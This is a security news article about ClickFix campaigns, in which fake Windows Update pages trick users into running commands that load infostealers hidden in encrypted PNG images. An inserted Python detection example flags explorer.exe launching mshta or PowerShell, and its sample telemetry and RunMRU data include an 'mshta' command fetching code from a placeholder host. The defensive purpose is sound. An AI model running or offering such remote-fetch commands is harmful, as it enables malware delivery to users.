- Fake Windows updates deliver advanced malware hidden inside encrypted PNG images
- Hackers trick victims with refresh screens that secretly execute malicious commands
- Stego Loader reconstructs dangerous payloads completely in memory using C# routines
Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.
ClickFix attacks convince users to execute commands in Windows by mimicking legitimate refresh prompts on full-screen web browser pages, Huntress researchers Ben Folland and Anna Pham found.
The experts reported that in some cases, attackers instruct victims to press certain keys, which automatically insert malicious commands into the Windows Run box.
Steganography and multi-step payload
These commands then trigger the execution of malware, bypassing standard system protections and affecting both individual and corporate systems.
The malware payloads are hidden using steganography inside PNG images, encrypted with AES and reconstructed by a .NET assembly called Stego Loader.
This loader extracts the shellcode using custom C# routines and repackages it with the Donut tool, allowing the execution of VBScript, JScript, EXE, DLL files, and .NET assemblies entirely in memory.
Analysts identified the resulting malware as variants of LummaC2 and Rhadamanthys.
The use of steganography in these attacks shows that malware delivery is moving beyond traditional executable files, creating a new challenge for threat detection and incident response teams.
Attackers also use dynamic evasion tactics such as a "trampoline" technique that calls thousands of empty functions to make analysis more difficult.
A variant using the fake Windows Update decoy was discovered in October 2025, and law enforcement disrupted part of its infrastructure through Operation Endgame in November.
This prevented the final payload from being delivered via malicious domains, although the fake update pages remain active.
The attacks continue to evolve, alternating between human confirmation prompts and refresh animations to trick users into executing commands.
The researchers recommend monitoring process chains for suspicious activity, such as explorer.exe spawning mshta.exe or PowerShell.
Investigators can also review the RunMRU registry key for executed commands.
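The two checks the researchers recommend, as an added example that is not from the article or from Huntress: flag the explorer.exe -> mshta.exe / PowerShell process chain in constructed process-creation log lines, and order the entries of a RunMRU export most-recent-first. The log field names, sample lines and sample registry values are assumptions constructed for the demonstration; the RunMRU layout (single-letter value names holding "command\1", plus an MRUList value giving recency order) is the real on-disk format.

```python
"""Added example (not the article's or Huntress's code): detect the ClickFix
process chain in constructed log lines and read a constructed RunMRU export."""
import re

# Parent/child pairs the article calls out: explorer.exe launching mshta.exe or PowerShell.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe"}

# Assumed log layout: parent=<path> image=<path> cmdline="<command line>"
LOG_RE = re.compile(r'parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmdline="(?P<cmdline>[^"]*)"')


def flag_process_chains(lines):
    """Return (child image, command line) for each line where explorer.exe spawns a flagged child."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parent = m.group("parent").rsplit("\\", 1)[-1].lower()
        image = m.group("image").rsplit("\\", 1)[-1].lower()
        if parent == "explorer.exe" and image in SUSPICIOUS_CHILDREN:
            hits.append((image, m.group("cmdline")))
    return hits


def runmru_history(values):
    """Order RunMRU entries most-recent-first.

    `values` mirrors HKCU\\...\\Explorer\\RunMRU: single-letter value names hold
    the typed command followed by a literal '\\1'; MRUList lists the letters
    with the most recently used first."""
    order = values.get("MRUList", "")
    return [values[letter].removesuffix("\\1") for letter in order if letter in values]


# Constructed sample telemetry (not real events); example.invalid is a reserved placeholder domain.
SAMPLE_LOG = [
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\mshta.exe cmdline="mshta https://example.invalid/update"',
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad"',
    'parent=C:\\Windows\\System32\\cmd.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -c dir"',
]
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1", "b": "mshta https://example.invalid/update\\1"}

if __name__ == "__main__":
    for image, cmdline in flag_process_chains(SAMPLE_LOG):
        print(f"suspicious chain: explorer.exe -> {image}: {cmdline}")
    for entry in runmru_history(SAMPLE_RUNMRU):
        print("RunMRU entry:", entry)
```

The third sample line is PowerShell launched from cmd.exe, which the chain rule deliberately ignores; only the explorer.exe parent (what a user pressing Win+R produces) is flagged.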
Organizations are advised to combine malware removal methods with antivirus scanning and firewall protection to limit exposure.
Disabling the Windows Run box where possible and carefully inspecting image-based payloads are additional recommended precautions.
Companies must account for risks arising from legitimate-looking assets such as images and scripts being weaponized, complicating logging, monitoring and forensic analysis.
This also raises concerns about supply chain security and the potential for attackers to exploit trusted update mechanisms as entry points.